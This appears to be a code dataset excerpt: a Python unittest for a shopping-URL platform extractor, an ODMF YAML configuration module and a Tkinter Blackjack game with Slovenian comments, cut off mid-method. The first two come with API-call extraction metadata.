'''Test for parsing config file
'''
testfile_config = Extractor(os.path.join(os.path.dirname(__file__), 'amazon_config_testdata.ini'))
testfile_output = testfile_config.platforms
self.assertEqual(testfile_output, product_output)
def testConfigParserFail(self):
'''Test for failing in reading config file ...
in case it is in invalid format or not present
'''
self.assertRaises(ConfigDoesNotExistException, Extractor, 'test.yaml')
def testInvalidConfigKeyHandling(self):
'''Test for exception handling in case of invalid keys
The keys url.path and url.domains are required config
for a platform. Platform configs where these are missing
should be ignored
'''
cases = (
( # Invalid only
dedent("""
[amazon]
domain = amaz.on
path = xyz
"""),
{}
),
( # Invalid followed by valid
dedent("""
[amaz.on]
domains = amaz.on
urlpath = xyz
[amazon]
url.domains = amazon.com
url.path = xyz
"""),
{ 'amazon': { CONFIG_KEY_URL: {
CONFIG_KEY_DOMAINS: ['amazon.com'],
CONFIG_KEY_PATHS: 'xyz',
}}}
),
( # 2 valids followed by an invalid
dedent("""
[amazon]
url.domains = amazon.com
url.path = xyz
[flipkart]
url.domains = flipkart.com
url.path = flipped
[amaz.on]
domain = amaz.on
path = xyz
"""),
{
'amazon': { CONFIG_KEY_URL: {
CONFIG_KEY_DOMAINS: ['amazon.com'],
CONFIG_KEY_PATHS: 'xyz',
}},
'flipkart': { CONFIG_KEY_URL : {
CONFIG_KEY_DOMAINS: ['flipkart.com'],
CONFIG_KEY_PATHS: 'flipped',
}}
}
),
)
for testcase, expected_result in cases:
self.assertDictEqual(Extractor(StringIO(testcase)).platforms, expected_result)
def testValidGetPlatform(self):
'''Testing different supported platforms
Test for valid url and then the result...
i.e, returning supported platform for ...
valid url
'''
platform = self.extractor.get_platform('http://www.amazon.com/Crosley-CR8005A-BL-Cruiser-Portable-Turntable/dp/B008P8ELAE/ref=sr_1_8?m=A21C4U5X700J66&s=aht&ie=UTF8&qid=1402383743&sr=1-8')
self.assertIsNotNone(platform)
self.assertEqual(platform, self.amazon_platform)
platform = self.extractor.get_platform('http://www.flipkart.com/dc-comics-printed-men-s-round-neck-t-shirt/p/itmdvgwnbbhpf9gu?pid=TSHDVGWHMMHHFNNE&srno=b_4&ref=d3ab4e88-53b7-4ed9-899a-1d5fc76c3514')
self.assertIsNotNone(platform)
self.assertEqual(platform, self.flipkart_platform)
platform = self.extractor.get_platform('flipkart.com/dc-comics-printed-men-s-round-neck-t-shirt/p/itmdvgwnbbhpf9gu?pid=TSHDVGWHMMHHFNNE&srno=b_4&ref=d3ab4e88-53b7-4ed9-899a-1d5fc76c3514')
self.assertIsNotNone(platform)
self.assertEqual(platform, self.flipkart_platform)
platform = self.extractor.get_platform('//www.amazon.com/Crosley-CR8005A-BL-Cruiser-Portable-Turntable/dp/B008P8ELAE/ref=sr_1_8?m=A21C4U5X700J66&s=aht&ie=UTF8&qid=1402383743&sr=1-8')
self.assertIsNotNone(platform)
self.assertEqual(platform, self.amazon_platform)
platform = self.extractor.get_platform('://itunes.apple.com/in/album/ar.rahman-hits/id872316282')
self.assertIsNotNone(platform)
self.assertEqual(platform, self.itunes_platform)
platform = self.extractor.get_platform('http://store.apple.com/us/buy-appletv/appletv')
self.assertIsNotNone(platform)
self.assertEqual(platform, self.apple_platform)
platform = self.extractor.get_platform(' http://store.apple.com/us/buy-appletv/appletv ')
self.assertIsNotNone(platform)
self.assertEqual(platform, self.apple_platform)
platform = self.extractor.get_platform('http://www.flipkart.com/apple-16gb-ipad-mini-wi-fi/p/itmdwptvje38mfkh?pid=TABDFWGGVJZ4YHZM&srno=b_2&ref=bcc2c663-54f6-4155-a93c-bccfc62488f6')
self.assertIsNotNone(platform)
self.assertEqual(platform, self.flipkart_platform)
platform = self.extractor.get_platform('https://itunes.apple.com/in/album/maaloom-from-lekar-hum-deewana/id880141533')
self.assertIsNotNone(platform)
self.assertEqual(platform, self.itunes_platform)
platform = self.extractor.get_platform('http://store.apple.com/us/buy-ipad/ipad-air/64gb-silver-wifi?aid=www-k2-ipad+air+-+index-n%40p&cp=k2-ipad+air+-n%40p')
self.assertIsNotNone(platform)
self.assertEqual(platform, self.apple_platform)
platform = self.extractor.get_platform('http://www.amazon.com/Denon-AVR-E300-Channel-Networking-Receiver/dp/B00B7X2OV2/ref=lp_281056_1_3?s=tv&ie=UTF8&qid=1402390122&sr=1-3')
self.assertIsNotNone(platform)
self.assertEqual(platform, self.amazon_platform)
platform = self.extractor.get_platform('http://store.apple.com/us/product/HA895LL/A/nest-learning-thermostat-2nd-generation?fnode=a79a99869a5fd6441d07af7100325defd98d5dc502fac468a84ce72c63b91861ec5e707b1ca3af4fc9b7bfeb3ab050274397db7543a1712d5600fd3905eb4e682ad4682763d0908859bb31d02a930480fa862da590992c35f83d72c47a61e7831a1dea5a541bb02c5d84cc287e507189')
self.assertIsNotNone(platform)
self.assertEqual(platform, self.apple_platform)
platform = self.extractor.get_platform('http://www.flipkart.com/flippd-men-s-checkered-casual-shirt/p/itmdtsh62kgrczfw?ayuhs/p/ayush/ayush')
self.assertIsNotNone(platform)
self.assertEqual(platform, self.flipkart_platform)
# Test for a path match in the query string
query_test_extractor = Extractor(StringIO(dedent("""
[example]
url.domains = example.com
url.path = id=\d+
""")))
query_test_platform = ('example', query_test_extractor.platforms['example'])
query_test_url = 'http://example.com/something/in/the/path?query=string&id=345&nice'
platform = query_test_extractor.get_platform(query_test_url)
self.assertIsNotNone(platform)
self.assertEqual(platform, query_test_platform)
def testInvalidGetPlatform(self):
'''Tests for Invalid url
Checking the invalid urls and their return...
value which should be None for invalid urls
'''
self.assertIsNone(self.extractor.get_platform('http://www.flipkart.com/mens-clothing/t-shirts/pr?p[]=facets.type[]=Round%2BNeck&p[]=sort:popularity&sid=2oq,s9b,j9y&facetOrder[]=type&otracker=ch_vn_tshirts_me_subcategory_Round%20Neck#jumpTo=0|15'))
self.assertIsNone(self.extractor.get_platform('ayush'))
self.assertIsNone(self.extractor.get_platform('/www.flipkart.com/puma-solid-men-s-round-neck-t-shirt/p/itmdvfxctgsrbrdx?pid=TSHDVFWXGRCE8GYF&srno=b_6&ref=1761106e-e0f8-4a44-9fda-be55939634c2'))
self.assertIsNone(self.extractor.get_platform('http://www.amazon.com/s/'))
self.assertIsNone(self.extractor.get_platform('https://www.apple.com/itunes/'))
self.assertIsNone(self.extractor.get_platform(1234))
self.assertIsNone(self.extractor.get_platform(str))
self.assertIsNone(self.extractor.get_platform('<EMAIL>'))
self.assertIsNone(self.extractor.get_platform('http://www.amazon.com/puma-solid-men-s-round-neck-t-shirt/p/itmdvfxctgsrbrdx'))
self.assertIsNone(self.extractor.get_platform('http://www.facebook.com/pink-floyd-printed-men-s-round-neck-t-shirt/p/itmdz46ubth869nz?pid=TSHDZ46T7QZGJSFS&srno=b_9&ref=040d98ab-ea8c-466d-86bb-f9bd5114231c'))
self.assertIsNone(self.extractor.get_platform(''))
def testExtract(self):
'''Test for checking if the right function call is made or not
Test for valid and invalid url that checks if the ...
invoke_extraction_method is called or not
'''
ref = Extractor(BASE_CONFIG_TESTFILE)
ref.invoke_extraction_method = MagicMock()
ref.extract('http://www.flipkart.com/hanes-solid-men-s-round-neck-t-shirt/p/itmdu4rcb6awun7j?pid=TSHDU4RCKUZSCZ8B&srno=b_2&ref=6a37b3b1-9d4d-43b7-a40d-868d5b897308')
self.assertTrue(ref.invoke_extraction_method.called)
ref.invoke_extraction_method = MagicMock()
ref.extract('http://store.apple.com/us/buy-ipad/ipad-air/64gb-silver-wifi?aid=www-k2-ipad+air+-+index-n%40p&cp=k2-ipad+air+-n%40p')
self.assertTrue(ref.invoke_extraction_method.called)
ref.invoke_extraction_method = MagicMock()
ref.extract('http://www.facebook.com/pink-floyd-printed-men-s-round-neck-t-shirt/p/itmdz46ubth869nz?pid=TSHDZ46T7QZGJSFS&srno=b_9&ref=040d98ab-ea8c-466d-86bb-f9bd5114231c')
self.assertFalse(ref.invoke_extraction_method.called)
ref.invoke_extraction_method = MagicMock()
ref.extract('//www.amazon.com/Crosley-CR8005A-BL-Cruiser-Portable-Turntable/dp/B008P8ELAE/ref=sr_1_8?m=A21C4U5X700J66&s=aht&ie=UTF8&qid=1402383743&sr=1-8')
self.assertTrue(ref.invoke_extraction_method.called)
ref.get_platform = MagicMock()
ref.extract('http://store.apple.com/us/buy-ipad/ipad-air/64gb-silver-wifi?aid=www-k2-ipad+air+-+index-n%40p&cp=k2-ipad+air+-n%40p')
ref.get_platform.assert_called_once_with('http://store.apple.com/us/buy-ipad/ipad-air/64gb-silver-wifi?aid=www-k2-ipad+air+-+index-n%40p&cp=k2-ipad+air+-n%40p')
@patch('shoplift.scrapers.opengraph')
def testinvoke_opengraph(self, mock_opengraph):
'''Test for invoke_extraction call
Test that checks if the correct scraper method has ...
called or not
'''
ext = Extractor(BASE_CONFIG_TESTFILE)
ext.invoke_extraction_method({ 'method': 'opengraph.title' }, 'http://www.flipkart.com/hanes-solid-men-s-round-neck-t-shirt/p/itmdu4rcb6awun7j?pid=TSHDU4RCKUZSCZ8B&srno=b_2&ref=6a37b3b1-9d4d-43b7-a40d-868d5b897308')
mock_opengraph.assert_called_with('http://www.flipkart.com/hanes-solid-men-s-round-neck-t-shirt/p/itmdu4rcb6awun7j?pid=TSHDU4RCKUZSCZ8B&srno=b_2&ref=6a37b3b1-9d4d-43b7-a40d-868d5b897308', 'title')
@patch('shoplift.filters.regex')
@patch('shoplift.scrapers.microdata')
def testinvoke_regex(self, mock_microdata, mock_regex):
'''Test for checking filter call'''
ext = Extractor(BASE_CONFIG_TESTFILE)
ext.invoke_extraction_method({ 'method': 'microdata.name', 'filter': 'regex.abc' }, 'ayush')
mock_microdata.assert_called_with('ayush', 'name')
mock_microdata.return_value = 'xyz'
ext.invoke_extraction_method({ 'method': 'microdata.name', 'filter': 'regex.abc' }, 'ayush')
mock_regex.assert_called_with('xyz', 'abc')
@patch('shoplift.filters.tuple')
@patch('shoplift.scrapers.xpath')
def testinvoke_tuple(self, mock_xpath, mock_tuple):
'''Test for checking tuple filter call'''
ext = Extractor(BASE_CONFIG_TESTFILE)
ext.invoke_extraction_method({ 'method': 'xpath.ay/asa*/c.*', 'filter': 'tuple.0' }, 'any_url')
mock_xpath.assert_called_with('any_url', 'ay/asa*/c.*')
mock_xpath.return_value = ('ayush', 123)
ext.invoke_extraction_method({ 'method': 'xpath.ay/asa*/c.*', 'filter': 'tuple.0' }, 'any_url')
mock_tuple.assert_called_with(('ayush', 123), '0')
if __name__ == "__main__":
unittest.main()
| [
"StringIO.StringIO",
"textwrap.dedent",
"mock.patch",
"os.path.dirname",
"unittest.main",
"mock.MagicMock"
] | [((314, 339), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (329, 339), False, 'import os\n'), ((14746, 14782), 'mock.patch', 'patch', (['"""shoplift.scrapers.opengraph"""'], {}), "('shoplift.scrapers.opengraph')\n", (14751, 14782), False, 'from mock import MagicMock, patch\n'), ((15488, 15519), 'mock.patch', 'patch', (['"""shoplift.filters.regex"""'], {}), "('shoplift.filters.regex')\n", (15493, 15519), False, 'from mock import MagicMock, patch\n'), ((15525, 15561), 'mock.patch', 'patch', (['"""shoplift.scrapers.microdata"""'], {}), "('shoplift.scrapers.microdata')\n", (15530, 15561), False, 'from mock import MagicMock, patch\n'), ((16098, 16129), 'mock.patch', 'patch', (['"""shoplift.filters.tuple"""'], {}), "('shoplift.filters.tuple')\n", (16103, 16129), False, 'from mock import MagicMock, patch\n'), ((16135, 16167), 'mock.patch', 'patch', (['"""shoplift.scrapers.xpath"""'], {}), "('shoplift.scrapers.xpath')\n", (16140, 16167), False, 'from mock import MagicMock, patch\n'), ((16743, 16758), 'unittest.main', 'unittest.main', ([], {}), '()\n', (16756, 16758), False, 'import unittest\n'), ((1703, 1920), 'textwrap.dedent', 'dedent', (['"""\n [flipkart]\n url.domains = flipkart, flip.kart, flipkar.t, .flipkart, www.flipkart.com, flip-kart\n url.path = (.*/dp/.*/.8)|(/uaa/.*/.*/.*)|(/a/.*/.*)\n """'], {}), '(\n """\n [flipkart]\n url.domains = flipkart, flip.kart, flipkar.t, .flipkart, www.flipkart.com, flip-kart\n url.path = (.*/dp/.*/.8)|(/uaa/.*/.*/.*)|(/a/.*/.*)\n """\n )\n', (1709, 1920), False, 'from textwrap import dedent\n'), ((2536, 2567), 'StringIO.StringIO', 'StringIO', (['comma_separated_input'], {}), '(comma_separated_input)\n', (2544, 2567), False, 'from StringIO import StringIO\n'), ((2803, 2931), 'textwrap.dedent', 'dedent', (['"""\n [ebay]\n url.domains = ebay.com\n url.path = *.////\\\\s([^abc])\n """'], {}), '(\n """\n [ebay]\n url.domains = ebay.com\n url.path = *.////\\\\s([^abc])\n """\n )\n', (2809, 2931), False, 'from textwrap import dedent\n'), ((3222, 3254), 'StringIO.StringIO', 'StringIO', (['comma_separated_input0'], {}), '(comma_separated_input0)\n', (3230, 3254), False, 'from StringIO import StringIO\n'), ((3673, 3960), 'textwrap.dedent', 'dedent', (['"""\n [amazon]\n url.path = /.*/dp/.*/.*\n url.domains = amazon, junglee\n image_url = amazon_api.large_image_url\n name = amazon_api.title\n price = amazon_api.price_and_currency\n """'], {}), '(\n """\n [amazon]\n url.path = /.*/dp/.*/.*\n url.domains = amazon, junglee\n image_url = amazon_api.large_image_url\n name = amazon_api.title\n price = amazon_api.price_and_currency\n """\n )\n', (3679, 3960), False, 'from textwrap import dedent\n'), ((3978, 4000), 'StringIO.StringIO', 'StringIO', (['string_input'], {}), '(string_input)\n', (3986, 4000), False, 'from StringIO import StringIO\n'), ((13273, 13284), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (13282, 13284), False, 'from mock import MagicMock, patch\n'), ((13568, 13579), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (13577, 13579), False, 'from mock import MagicMock, patch\n'), ((13829, 13840), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (13838, 13840), False, 'from mock import MagicMock, patch\n'), ((14132, 14143), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (14141, 14143), False, 'from mock import MagicMock, patch\n'), ((14405, 14416), 'mock.MagicMock', 'MagicMock', ([], {}), '()\n', (14414, 14416), False, 'from mock import MagicMock, patch\n'), ((4333, 4358), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (4348, 4358), False, 'import os\n'), ((5148, 5286), 'textwrap.dedent', 'dedent', (['"""\n [amazon]\n domain = amaz.on\n path = xyz\n """'], {}), '(\n """\n [amazon]\n domain = amaz.on\n path = xyz\n """\n )\n', (5154, 5286), False, 'from textwrap import dedent\n'), ((5372, 5645), 'textwrap.dedent', 'dedent', (['"""\n [amaz.on]\n domains = amaz.on\n urlpath = xyz\n \n [amazon]\n url.domains = amazon.com\n url.path = xyz\n """'], {}), '(\n """\n [amaz.on]\n domains = amaz.on\n urlpath = xyz\n \n [amazon]\n url.domains = amazon.com\n url.path = xyz\n """\n )\n', (5378, 5645), False, 'from textwrap import dedent\n'), ((5887, 6294), 'textwrap.dedent', 'dedent', (['"""\n [amazon]\n url.domains = amazon.com\n url.path = xyz\n \n [flipkart]\n url.domains = flipkart.com\n url.path = flipped\n \n [amaz.on]\n domain = amaz.on\n path = xyz\n """'], {}), '(\n """\n [amazon]\n url.domains = amazon.com\n url.path = xyz\n \n [flipkart]\n url.domains = flipkart.com\n url.path = flipped\n \n [amaz.on]\n domain = amaz.on\n path = xyz\n """\n )\n', (5893, 6294), False, 'from textwrap import dedent\n'), ((10864, 10988), 'textwrap.dedent', 'dedent', (['"""\n [example]\n url.domains = example.com\n url.path = id=\\\\d+\n """'], {}), '(\n """\n [example]\n url.domains = example.com\n url.path = id=\\\\d+\n """\n )\n', (10870, 10988), False, 'from textwrap import dedent\n'), ((6821, 6839), 'StringIO.StringIO', 'StringIO', (['testcase'], {}), '(testcase)\n', (6829, 6839), False, 'from StringIO import StringIO\n')] |
# Parse conf.py in the root directory and check for validity
#
# A more detailed explanation of a valid configuration can be found
# in the documentation
#
import yaml
from pathlib import Path
import sys
import os
from logging import getLogger
from . import prefix, __version__
logger = getLogger(__name__)
class ConfigurationError(RuntimeError):
pass
def static_locations(*from_config):
paths = [Path(__file__).parent / 'static'] + [Path(p) for p in from_config]
filtered = []
[filtered.append(str(p)) for p in paths if p and p.exists() and p not in filtered]
return filtered
class Configuration:
"""
The configuration class. Change the configuration by providing a config.yml in the home directory
Mandatory fields are defined as (...), optional as None or with a default value
"""
datetime_default_timezone = 'Europe/Berlin'
database_type = 'postgres'
database_name = ''
database_username = ''
database_password = ''
database_host = '127.0.0.1'
static = [prefix]
media_image_path = 'webpage/media'
nav_background = '/media/gladbacherhof.jpg'
nav_left_logo = '/media/lfe-logo.png'
manual_measurements_pattern = '(.+\\/)*datafiles\\/lab\\/([a-zA-Z0-9]+\\/)*.*\\.(xls|xlsx)$'
map_default = {'lat': 50.5, 'lng': 8.55, 'type': 'hybrid', 'zoom': 15}
utm_zone = '32N'
upload_max_size = 25000000
server_port = 8080
google_maps_api_key = ''
woftester_receiver_mail = ['<EMAIL>']
woftester_sender_mail = '<EMAIL>'
cuahsi_wsdl_endpoint = 'http://fb09-pasig.umwelt.uni-giessen.de/wof/index.php/cuahsi_1_1.asmx?WSDL'
smtp_serverurl = 'mailout.uni-giessen.de'
root_url = '/'
datafiles = './datafiles'
preferences = './preferences'
description = 'A server for data-management for quantitative field research'
user = os.environ.get('USER') or os.environ.get('USERNAME')
def __bool__(self):
return ... not in vars(self).values()
def to_dict(self):
return {
k: v
for k, v in vars(self).items()
if (
not callable(v)
and not k.startswith('_')
and type(v) is not property
)
}
def update(self, conf_dict: dict):
unknown_keys = []
for k in conf_dict:
if hasattr(self, k):
setattr(self, k, conf_dict[k])
else:
unknown_keys.append(k)
if unknown_keys:
raise ConfigurationError(f'Your configuration contains unknown keys: {",".join(unknown_keys)}')
return self
def __init__(self, **kwargs):
vars(self).update({
k: v
for k, v in vars(type(self)).items()
if not k.startswith('_') and not callable(v)
})
self.update(kwargs)
self.home = str(Path(prefix).absolute())
self.static = static_locations(self.home, *self.static)
def abspath(self, relative_path: Path):
"""
Returns a pathlib.Path from the first fitting static location
:param relative_path: A relative path to a static ressource
"""
for static_home in reversed(self.static):
p = Path(static_home) / relative_path
if p.exists():
return p.absolute()
raise FileNotFoundError(f'{relative_path} not found in the static ressources')
def to_yaml(self, stream=sys.stdout):
"""
Exports the current configuration to a yaml file
:param stream: A stream to write to
"""
d = self.to_dict()
yaml.safe_dump(d, stream)
def google_maps_api(self, callback: str):
return f'https://maps.googleapis.com/maps/api/js?key={self.google_maps_api_key}&callback={callback}'
@property
def version(self):
return __version__
def load_config():
conf_file = Path(prefix) / 'config.yml'
logger.debug('Found config file:' + str(conf_file.absolute()))
if not conf_file.exists():
logger.warning(f'{conf_file.absolute().as_posix()} '
f'not found. Create a template with "odmf configure". Using incomplete configuration')
conf_dict = {}
else:
conf_dict = yaml.safe_load(conf_file.open()) or {}
logger.debug(f'loaded {conf_file.resolve()}')
conf = Configuration(**conf_dict)
if not conf:
logger.warning(', '.join(k for k, v in conf.to_dict().items() if v is ...) + ' are undefined')
return conf
def import_module_configuration(conf_module_filename):
"""
Migration utitlity to create a conf.yaml from the old ODMF 0.x conf.py module configuration
:param conf_module_filename: The conf.py configuration file
"""
code = compile(open(conf_module_filename).read(), 'conf.py', 'exec')
config = {}
exec(code, config)
def c(s: str):
return s.replace('CFG_', '').lower()
config = {
c(k): v
for k, v in config.items()
if k.upper() == k and k[0] != '_' and not callable(v)
}
config['database_type'] = config.pop('database', 'postgres')
conf = Configuration(**config)
return conf
conf = load_config()
| [
"logging.getLogger",
"yaml.safe_dump",
"os.environ.get",
"pathlib.Path"
] | [((291, 310), 'logging.getLogger', 'getLogger', (['__name__'], {}), '(__name__)\n', (300, 310), False, 'from logging import getLogger\n'), ((1853, 1875), 'os.environ.get', 'os.environ.get', (['"""USER"""'], {}), "('USER')\n", (1867, 1875), False, 'import os\n'), ((1879, 1905), 'os.environ.get', 'os.environ.get', (['"""USERNAME"""'], {}), "('USERNAME')\n", (1893, 1905), False, 'import os\n'), ((3635, 3660), 'yaml.safe_dump', 'yaml.safe_dump', (['d', 'stream'], {}), '(d, stream)\n', (3649, 3660), False, 'import yaml\n'), ((3919, 3931), 'pathlib.Path', 'Path', (['prefix'], {}), '(prefix)\n', (3923, 3931), False, 'from pathlib import Path\n'), ((451, 458), 'pathlib.Path', 'Path', (['p'], {}), '(p)\n', (455, 458), False, 'from pathlib import Path\n'), ((3248, 3265), 'pathlib.Path', 'Path', (['static_home'], {}), '(static_home)\n', (3252, 3265), False, 'from pathlib import Path\n'), ((414, 428), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (418, 428), False, 'from pathlib import Path\n'), ((2886, 2898), 'pathlib.Path', 'Path', (['prefix'], {}), '(prefix)\n', (2890, 2898), False, 'from pathlib import Path\n')] |
import random
import tkinter
import math
class Blackjack():
def __init__(self, master):
#Menu
glavniMenu = tkinter.Menu(master)
master.config(menu = glavniMenu)
menuBJ = tkinter.Menu(glavniMenu)
glavniMenu.add_cascade(label = 'Blackjack', menu=menuBJ)
menuBJ.add_cascade(label = 'New Game', command = self.newGame)
menuBJ.add_cascade(label = 'Quit', command = master.destroy)
#zeleno platno (igralna povrsina)
self.platno = tkinter.Canvas(master, width = 700, height = 480, bg = 'green')
self.platno.grid(row = 0, column = 0)
#Crte
self.pokoncaCrta = self.platno.create_line(500, 0, 500, 600, width = 4)
self.lezecaCrta = self.platno.create_line(0, 410, 500, 410, width = 4)
#####Spremenljivke
self.sezKart = ['karte/1.gif', 'karte/2.gif', 'karte/3.gif', 'karte/4.gif', 'karte/5.gif',
'karte/6.gif', 'karte/7.gif', 'karte/8.gif', 'karte/9.gif', 'karte/10.gif',
'karte/11.gif', 'karte/12.gif', 'karte/13.gif', 'karte/4.gif', 'karte/15.gif',
'karte/16.gif', 'karte/17.gif', 'karte/18.gif', 'karte/19.gif', 'karte/20.gif',
'karte/21.gif', 'karte/22.gif', 'karte/23.gif', 'karte/24.gif', 'karte/25.gif',
'karte/26.gif', 'karte/27.gif', 'karte/28.gif', 'karte/29.gif', 'karte/30.gif',
'karte/31.gif', 'karte/32.gif', 'karte/33.gif', 'karte/34.gif', 'karte/35.gif',
'karte/36.gif', 'karte/37.gif', 'karte/38.gif', 'karte/39.gif', 'karte/40.gif',
'karte/41.gif', 'karte/42.gif', 'karte/43.gif', 'karte/44.gif', 'karte/45.gif',
'karte/46.gif', 'karte/47.gif', 'karte/48.gif', 'karte/49.gif', 'karte/50.gif',
'karte/51.gif', 'karte/52.gif']
self.credit = 1000 #toliko dobimo na zacetku
self.vsotaStave = 0 #trenutna stava
self.scorePlayer = 0 #tocke igralca
self.scoreDealer = 0 #tocke dealerja
#seznam igralcevih kart
self.indexIgralceveKarte = 0 #katero karto damo na platno, dve karti dobimo ob inic. izbiramo tretjo
self.sezKartIgralec = ['','',''] #dejanska imena kart za sklicevanje
self.sezKartIgralecPlatno = ['','',''] #da bodo karte vidne na zaslonu
#Pozicja (x,y) za igralceve karte
self.pX = 260
self.pY = 350
#seznam dealerjevih kart
self.indexDealerjeveKarte = 0 #katero karto damo na platno, dve karti dobimo ob inic. izbiramo tretjo
self.sezKartDealer = ['','',''] #dejanska imena kart za sklicevanje
self.sezKartDealerPlatno = ['','',''] #da bodo karte vidne na zaslonu
#Pozicja (x,y) za dealerjeve karte
self.dX = 260
self.dY = 120
#####
#####Napisi
#Zgolj napis kje so igralceve karte
self.napisIgralec = tkinter.Label(text = 'Player:', bg = 'green', fg = 'blue', font = ('Helvetica', 18, 'bold'))
self.napisIgralecNaPlatnu = self.platno.create_window(55, 280, window = self.napisIgralec)
#Zgolj napis kje do Dealerjeve karte
self.napisDealer = tkinter.Label(text = 'Dealer:', bg = 'green', fg = 'red', font = ('Helvetica', 18, 'bold'))
self.napisDealerNaPlatnu = self.platno.create_window(55, 50, window = self.napisDealer)
#Zgolj napis, da je pod tem napisom igralcevo financno stanje
self.napisCredit = tkinter.Label(text = 'Credit:', bg = 'green', font = ('Helvetica', 23, 'bold'))
self.napisCreditNaPlatnu = self.platno.create_window(600, 40, window = self.napisCredit)
#Zgolj napis, da je pod tem napisom igralceva trenutna stava
self.napisCurrentBet = tkinter.Label(text = 'Current Bet:', bg = 'green', font = ('Helvetica', 23, 'bold'))
self.napisCurrentBetNaPlatnu = self.platno.create_window(600, 250, window = self.napisCurrentBet)
#Dejanski napis, ki prikazuje igralcevo financno stanje
self.creditNapis = tkinter.Label(text = '$'+str(self.credit), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.creditNapisPlatno = self.platno.create_window(610, 90, window = self.creditNapis)
#Dejanski napis, ki prikazuje igralcevo trenutno stavo
self.vsotaStaveNapis = tkinter.Label(text = '$'+str(self.vsotaStave), bg = 'green', font = ('Helvetica', 27, 'bold'))
self.vsotaStaveNapisPlatno = self.platno.create_window(610, 295, window = self.vsotaStaveNapis)
##Tukaj so napisi za navodila igralcu
self.pWin = tkinter.Label(text = 'Player Wins!', bg = 'green', font = ('Helvetica', 24, 'bold'))
self.pBlackjack = tkinter.Label(text = 'Blackjack! Player Wins!', bg = 'green', font = ('Helvetica', 21, 'bold'))
self.pBust = tkinter.Label(text = 'Player Busts!', bg = 'green', fg = 'red', font = ('Helvetica', 21, 'bold'))
self.dWin = tkinter.Label(text = 'Delaer Wins!', bg = 'green', fg = 'red', font = ('Helvetica', 23, 'bold'))
self.dBlackjack = tkinter.Label(text = 'Dealer hits Blackjack! You Lose!', bg = 'green', font = ('Helvetica', 25, 'bold'))
self.dBust = tkinter.Label(text = 'Dealer Busts! Player Wins!', bg = 'green', font = ('Helvetica', 25, 'bold'))
self.draw = tkinter.Label(text = 'It is a Draw!', bg = 'green', font = ('Helvetica', 23, 'bold'))
self.hitORstand = tkinter.Label(text = 'Hit or Stand', bg = 'green', font = ('Helvetica', 23, 'bold'))
self.maxReached = tkinter.Label(text = 'Maximum of 5 cards reached!', bg = 'green', fg = 'red', font = ('Helvetica', 15, 'bold'))
self.placeBet = tkinter.Label(text = 'Place your bet and decide wether to Hit or Stand', bg = 'green', font = ('Helvetica', 11, 'bold'))
self.emptyBank = tkinter.Label(text = 'Player ran out of money. Please choose new game.', bg = 'green', font = ('Helvetica', 8, 'bold'))
#####
#####Gumbi
self.gumbHit = tkinter.Button(master, text = 'HIT', command = self.hit, state = 'disabled')
self.gumbHitNaPlatnu = self.platno.create_window(30, 450, window = self.gumbHit)
self.gumbStand = tkinter.Button(master, text = 'STAND', command = self.stand, state = 'disabled')
self.gumbStandNaPlatnu = self.platno.create_window(90, 450, window = self.gumbStand)
self.gumbNaprej = tkinter.Button(master, text = 'Next Round', command = self.naslednjaRoka)
#To bos se potreboval
self.gumbNaprejNaPlatnu = ''
self.gumb10 = tkinter.Button(master, text = '$10', command = self.dodaj10)
self.gumb10NaPlatnu = self.platno.create_window(300, 450, window = self.gumb10)
self.gumb20 = tkinter.Button(master, text = '$20', command = self.dodaj20)
self.gumb20NaPlatnu = self.platno.create_window(360, 450, window = self.gumb20)
self.gumb50 = tkinter.Button(master, text = '$50', command = self.dodaj50)
self.gumb50NaPlatnu = self.platno.create_window(420, 450, window = self.gumb50)
#####
#Prva vrstica
#self.SlikaNaPlatnu11 = self.platno.create_image(60, 120, image = self.karta1)
#self.SlikaNaPlatnu12 = self.platno.create_image(160, 120, image = self.karta1)
#self.SlikaNaPlatnu13 = self.platno.create_image(260, 120, image = self.karta1)
#self.SlikaNaPlatnu14 = self.platno.create_image(360, 120, image = self.karta1)
#self.SlikaNaPlatnu15 = self.platno.create_image(460, 120, image = self.karta1)
#Druga vrstica
#self.SlikaNaPlatnu21 = self.platno.create_image(60, 350, image = self.karta2)
#self.SlikaNaPlatnu22 = self.platno.create_image(160, 350, image = self.karta2)
#self.SlikaNaPlatnu23 = self.platno.create_image(260, 350, image = self.karta2)
#self.SlikaNaPlatnu24 = self.platno.create_image(360, 350, image = self.karta2)
#self.SlikaNaPlatnu25 = self.platno.create_image(460, 350, image = self.karta2)
#Tukaj inicializiramo igro...
random.shuffle(self.sezKart)#premesamo kup kart
##Najprej inicializiramo igralca
self.prvaKartaPlayer = self.sezKart.pop() #izberemo prvo karto igralcu
self.vrednost = self.vrednostKarte(self.prvaKartaPlayer) # dolocimo vrednost prve karte
self.scorePlayer += self.vrednost
self.prvaKartaPlayer = tkinter.PhotoImage(file = self.prvaKartaPlayer) #Playing with fire
self.prvaKartaPlayerNaPlatnu = self.platno.create_image(60, 350, image = self.prvaKartaPlayer)
self.drugaKartaPlayer = self.sezKart.pop() #izberemo drugo karto igralcu
self.vrednost = self.vrednostKarte(self.drugaKartaPlayer) # dolocimo vrednost druge karte
#ce dobimo se enega asa bi presegli 21, torej se as steje kot 1
if self.vrednost == 11 and self.scorePlayer > 10:
self.vrednost = 1
self.scorePlayer += self.vrednost
self.drugaKartaPlayer = tkinter.PhotoImage(file = self.drugaKartaPlayer) #Playing with fire
self.drugaKartaPlayerNaPlatnu = self.platno.create_image(160, 350, image = self.drugaKartaPlayer)
##
##Potem inicializiramo dealerja
self.prvaKartaDealer = self.sezKart.pop() #izberemo prvo karto dealerju
self.vrednost = self.vrednostKarte(self.prvaKartaDealer) # dolocimo vrednost prve karte
self.scoreDealer += self.vrednost
self.prvaKartaDealer = tkinter.PhotoImage(file = self.prvaKartaDealer) #Playing with fire
self.prvaKartaDealerNaPlatnu = self.platno.create_image(60, 120, image = self.prvaKartaDealer)
self.drugaKartaDealer = self.sezKart.pop() #izberemo drugo karto dealerju
self.vrednost = self.vrednostKarte(self.drugaKartaDealer) # dolocimo vrednost druge karte
#ce dobimo se enega asa bi presegli 21, torej se as steje kot 1
